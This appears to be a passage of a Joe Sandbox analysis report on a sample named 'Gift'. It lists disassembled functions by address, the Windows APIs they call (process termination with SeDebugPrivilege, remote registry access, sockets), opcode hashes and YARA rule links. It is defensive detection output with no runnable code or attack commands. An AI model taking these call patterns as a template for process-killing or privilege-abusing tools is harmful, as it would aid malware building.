                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                          • String ID:
                                                                          • API String ID: 2014098862-0
                                                                          • Opcode ID: 07b8a1662370d414fc9a8534813775f8c740aa5928fdf755d4bd8555d4dfec9f
                                                                          • Instruction ID: bf4ccbff1009bec45ba2f12d6fdae0c80dd28d05de96446fab25cd85570620a4
                                                                          • Opcode Fuzzy Hash: 07b8a1662370d414fc9a8534813775f8c740aa5928fdf755d4bd8555d4dfec9f
                                                                          • Instruction Fuzzy Hash: D011CEB1950618BFF6116B60DC8AF6B7B2DEB4D751F204819F2406B090CAF25C509AA0
                                                                          Function 003294D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0032915A,00000B00,?,?), ref: 003294E2
                                                                          • HeapAlloc.KERNEL32(00000000,?,0032915A,00000B00,?,?), ref: 003294E9
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0032915A,00000B00,?,?), ref: 003294FE
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0032915A,00000B00,?,?), ref: 00329506
                                                                          • DuplicateHandle.KERNEL32(00000000,?,0032915A,00000B00,?,?), ref: 00329509
                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0032915A,00000B00,?,?), ref: 00329519
                                                                          • GetCurrentProcess.KERNEL32(0032915A,00000000,?,0032915A,00000B00,?,?), ref: 00329521
                                                                          • DuplicateHandle.KERNEL32(00000000,?,0032915A,00000B00,?,?), ref: 00329524
                                                                          • CreateThread.KERNEL32(00000000,00000000,0032954A,00000000,00000000,00000000), ref: 0032953E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                          • String ID:
                                                                          • API String ID: 1957940570-0
                                                                          • Opcode ID: a3cd2511c6f326836a743781679cfbe7977725ee7e403a8c8fb4f8727f2171d5
                                                                          • Instruction ID: c56aaf3a3ff547534030f74988f6fd3d43dc209b59fde13886687106f6c5bfe7
                                                                          • Opcode Fuzzy Hash: a3cd2511c6f326836a743781679cfbe7977725ee7e403a8c8fb4f8727f2171d5
                                                                          • Instruction Fuzzy Hash: F101CDB5240304BFE711AFA5DC4EF6B7BACEB8A711F108411FA05DB1A1CAB19810CB20
                                                                          Function 0034A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                          • API String ID: 0-572801152
                                                                          • Opcode ID: 3e6eef73fda25c0b322b3aa46b34e04b8d77b4607a4cbe58e122ad391fdcdfa4
                                                                          • Instruction ID: d59d8a27edb3155ca07b1bf8b361a3267f3befbce2ebc739a5db25eea440990c
                                                                          • Opcode Fuzzy Hash: 3e6eef73fda25c0b322b3aa46b34e04b8d77b4607a4cbe58e122ad391fdcdfa4
                                                                          • Instruction Fuzzy Hash: 76C1B271A4061A9FDF12DF98C885AAEB7F9FF48310F158469E945AF280E770ED40CB51
                                                                          Function 003497FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$_memset
                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                          • API String ID: 2862541840-625585964
                                                                          • Opcode ID: d59f649f65324b862b3912497fcdd051eb56070b1e9599032469568d61a93957
                                                                          • Instruction ID: 1d53ca814c8b6aa734c6a51f74658f13cca0a0d9a4ca27c6e2022f41f6d23b33
                                                                          • Opcode Fuzzy Hash: d59f649f65324b862b3912497fcdd051eb56070b1e9599032469568d61a93957
                                                                          • Instruction Fuzzy Hash: 94917B70A00219ABDF26DFA5C885FAFBBB8EF45710F10855EE515AF290D770A944CFA0
                                                                          Function 003573A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00357449
                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 0035745D
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00357477
                                                                          • _wcscat.LIBCMT ref: 003574D2
                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 003574E9
                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00357517
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window_wcscat
                                                                          • String ID: SysListView32
                                                                          • API String ID: 307300125-78025650
                                                                          • Opcode ID: dc6662b85f0cd3452a8f7f581a41db9b65905438d17da308e29b7a99e7624b92
                                                                          • Instruction ID: 010b324be09780f70fb0490780a2e5f1a97459eb91b1bcb1231ba0b651c16756
                                                                          • Opcode Fuzzy Hash: dc6662b85f0cd3452a8f7f581a41db9b65905438d17da308e29b7a99e7624b92
                                                                          • Instruction Fuzzy Hash: E141B570904348AFDB229F64DC85FEEB7A8EF08351F11446AF945A72E1D7719D88CB60
                                                                          Function 0034F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00334148: CreateToolhelp32Snapshot.KERNEL32 ref: 0033416D
                                                                            • Part of subcall function 00334148: Process32FirstW.KERNEL32(00000000,?), ref: 0033417B
                                                                            • Part of subcall function 00334148: FindCloseChangeNotification.KERNEL32(00000000), ref: 00334245
                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0034F08D
                                                                          • GetLastError.KERNEL32 ref: 0034F0A0
                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0034F0CF
                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0034F14C
                                                                          • GetLastError.KERNEL32(00000000), ref: 0034F157
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0034F18C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                          • String ID: SeDebugPrivilege
                                                                          • API String ID: 1701285019-2896544425
                                                                          • Opcode ID: 991f0e77973c885190f2ea685f053844a9006be0087b9bffee6f45e07f47c49c
                                                                          • Instruction ID: c9cc3f99cf49eb15ad3b1317f5d795f25b959a5d630ee3afabd930ebcd5806e5
                                                                          • Opcode Fuzzy Hash: 991f0e77973c885190f2ea685f053844a9006be0087b9bffee6f45e07f47c49c
                                                                          • Instruction Fuzzy Hash: 0041A9302002119FDB26EF24DC96F6EB7A9AF84714F188459F8028F392CBB4A914CB95
                                                                          Function 003347E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00334802
                                                                          • LoadStringW.USER32(00000000), ref: 00334809
                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0033481F
                                                                          • LoadStringW.USER32(00000000), ref: 00334826
                                                                          • _wprintf.LIBCMT ref: 0033484C
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0033486A
                                                                          Strings
                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00334847
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                          • API String ID: 3648134473-3128320259
                                                                          • Opcode ID: f6d522c8db8d81a96bbcadfffeefa0e3a4d2bd4fbd48700fe7ef8b1e71654379
                                                                          • Instruction ID: 6d9e1cd62dbe0c675fd7008014568259bf9d2c324e0a95b118999b0533baf2ed
                                                                          • Opcode Fuzzy Hash: f6d522c8db8d81a96bbcadfffeefa0e3a4d2bd4fbd48700fe7ef8b1e71654379
                                                                          • Instruction Fuzzy Hash: 3D0144F69002087FE7169790DE8AEF7776CDB08300F404595F749D6041E7B4AE944B75
                                                                          Function 0035DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 0035DB42
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 0035DB62
                                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0035DD9D
                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0035DDBB
                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0035DDDC
                                                                          • ShowWindow.USER32(00000003,00000000), ref: 0035DDFB
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0035DE20
                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0035DE43
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                          • String ID:
                                                                          • API String ID: 1211466189-0
                                                                          • Opcode ID: d4124a37f8b2a5039a31689823615253c64465bbf370dedd808f6ed35f653a9b
                                                                          • Instruction ID: dd8fb43cb05ca998dabcb3e6426c6975389aaa04c63b2c3f49dadd163dc08eb2
                                                                          • Opcode Fuzzy Hash: d4124a37f8b2a5039a31689823615253c64465bbf370dedd808f6ed35f653a9b
                                                                          • Instruction Fuzzy Hash: 1EB19C31600215EFDF26CF69C9C6BAE7BB5FF04702F098069EC489E2A5D771A954CB90
                                                                          Function 00350371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0035147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0035040D,?,?), ref: 00351491
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0035044E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharConnectRegistryUpper_memmove
                                                                          • String ID:
                                                                          • API String ID: 3479070676-0
                                                                          • Opcode ID: f3fadb6659f7b3524021a4b729d79b6391233147ad3563c76e7f37a697412d0b
                                                                          • Instruction ID: 59dfe505f496fd71ba1a915bf6708c8625d2df5263dc644afba5ebb5bacb070b
                                                                          • Opcode Fuzzy Hash: f3fadb6659f7b3524021a4b729d79b6391233147ad3563c76e7f37a697412d0b
                                                                          • Instruction Fuzzy Hash: E0A18C702042019FCB16EF64C881F2EB7E5EF84315F14891DF9968B2A2DB71E969CF42
                                                                          Function 002D2E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0030C508,00000004,00000000,00000000,00000000), ref: 002D2E9F
                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0030C508,00000004,00000000,00000000,00000000,000000FF), ref: 002D2EE7
                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0030C508,00000004,00000000,00000000,00000000), ref: 0030C55B
                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0030C508,00000004,00000000,00000000,00000000), ref: 0030C5C7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow
                                                                          • String ID:
                                                                          • API String ID: 1268545403-0
                                                                          • Opcode ID: 1135d5c2bb64c3a714e316a861a5083586aa961b88474109a14a412a9b2979ea
                                                                          • Instruction ID: 2a8c09f6cfffe012308c2678e9f4ff07860bc1f4d0d0336b2c5316b63415e375
                                                                          • Opcode Fuzzy Hash: 1135d5c2bb64c3a714e316a861a5083586aa961b88474109a14a412a9b2979ea
                                                                          • Instruction Fuzzy Hash: 26410C34638681DAC73B8F29CC9976B7BD5ABA2300F18895FE447467A1C7B1BC68D710
                                                                          Function 00337681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00337698
                                                                            • Part of subcall function 002F0FE6: std::exception::exception.LIBCMT ref: 002F101C
                                                                            • Part of subcall function 002F0FE6: __CxxThrowException@8.LIBCMT ref: 002F1031
                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003376CF
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 003376EB
                                                                          • _memmove.LIBCMT ref: 00337739
                                                                          • _memmove.LIBCMT ref: 00337756
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00337765
                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0033777A
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00337799
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 256516436-0
                                                                          • Opcode ID: bf96c2edb9a549c05a2b26ae2023c8b932eeb9a2de18e5d3cbe426bcd97de10e
                                                                          • Instruction ID: 1b6b78ecda058cec9b6cad5da337316d2bee3d3970f1041af6a01264ff67b888
                                                                          • Opcode Fuzzy Hash: bf96c2edb9a549c05a2b26ae2023c8b932eeb9a2de18e5d3cbe426bcd97de10e
                                                                          • Instruction Fuzzy Hash: 8C319072914208EBCB11EF54DC86E7FB778EF45340F1480A9FD04AA246DB709E60CBA0
                                                                          Function 003567F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteObject.GDI32(00000000), ref: 00356810
                                                                          • GetDC.USER32(00000000), ref: 00356818
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00356823
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0035682F
                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0035686B
                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0035687C
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0035964F,?,?,000000FF,00000000,?,000000FF,?), ref: 003568B6
                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003568D6
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 3864802216-0
                                                                          • Opcode ID: 42b2be5f9b568160287e3a3561f0cef1962d59b1bc9652b4a9c764ab119e5362
                                                                          • Instruction ID: bb4b5b28fb67821b1473200c83c24ab085f997ae9994963331b8b4e1e3c88d68
                                                                          • Opcode Fuzzy Hash: 42b2be5f9b568160287e3a3561f0cef1962d59b1bc9652b4a9c764ab119e5362
                                                                          • Instruction Fuzzy Hash: 1B314D721012147FEB168F50CC8AFAB3BADEB49761F054065FE089A2A1D7B59851CB74
                                                                          Function 0032C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID:
                                                                          • API String ID: 2931989736-0
                                                                          • Opcode ID: 39148130df454c1cf1c030f5e60450b5b133f30c27d0b1fbc784b565b96e6651
                                                                          • Instruction ID: 2d0000fccf3364d4bbcecf68dbd000e3c38db1b100cae5e02cc8d58bd384f4b2
                                                                          • Opcode Fuzzy Hash: 39148130df454c1cf1c030f5e60450b5b133f30c27d0b1fbc784b565b96e6651
                                                                          • Instruction Fuzzy Hash: D421D772A21229BED206B524AD42FBF776C9E21784B049024FE06A6646E710DE31CAE1
                                                                          Function 0033F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                            • Part of subcall function 002E436A: _wcscpy.LIBCMT ref: 002E438D
                                                                          • _wcstok.LIBCMT ref: 0033F2D7
                                                                          • _wcscpy.LIBCMT ref: 0033F366
                                                                          • _memset.LIBCMT ref: 0033F399
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                          • String ID: X
                                                                          • API String ID: 774024439-3081909835
                                                                          • Opcode ID: 8f9fc6b6ed70bf1e286ed76d7bb3040711ee6332c477e2c3e16124c7a24ccd0d
                                                                          • Instruction ID: 862f5a3d443a0f6e941c7cc63e063e690e7b99bbc2929aafc1fd10ce11726b4b
                                                                          • Opcode Fuzzy Hash: 8f9fc6b6ed70bf1e286ed76d7bb3040711ee6332c477e2c3e16124c7a24ccd0d
                                                                          • Instruction Fuzzy Hash: 09C18B759147409FD715EF24C881A6BB7E4BF85350F90492EF8998B2A2DB30EC65CF82
                                                                          Function 003471EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003472EB
                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0034730C
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0034731F
                                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 003473D5
                                                                          • inet_ntoa.WSOCK32(?), ref: 00347392
                                                                            • Part of subcall function 0032B4EA: _strlen.LIBCMT ref: 0032B4F4
                                                                            • Part of subcall function 0032B4EA: _memmove.LIBCMT ref: 0032B516
                                                                          • _strlen.LIBCMT ref: 0034742F
                                                                          • _memmove.LIBCMT ref: 00347498
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
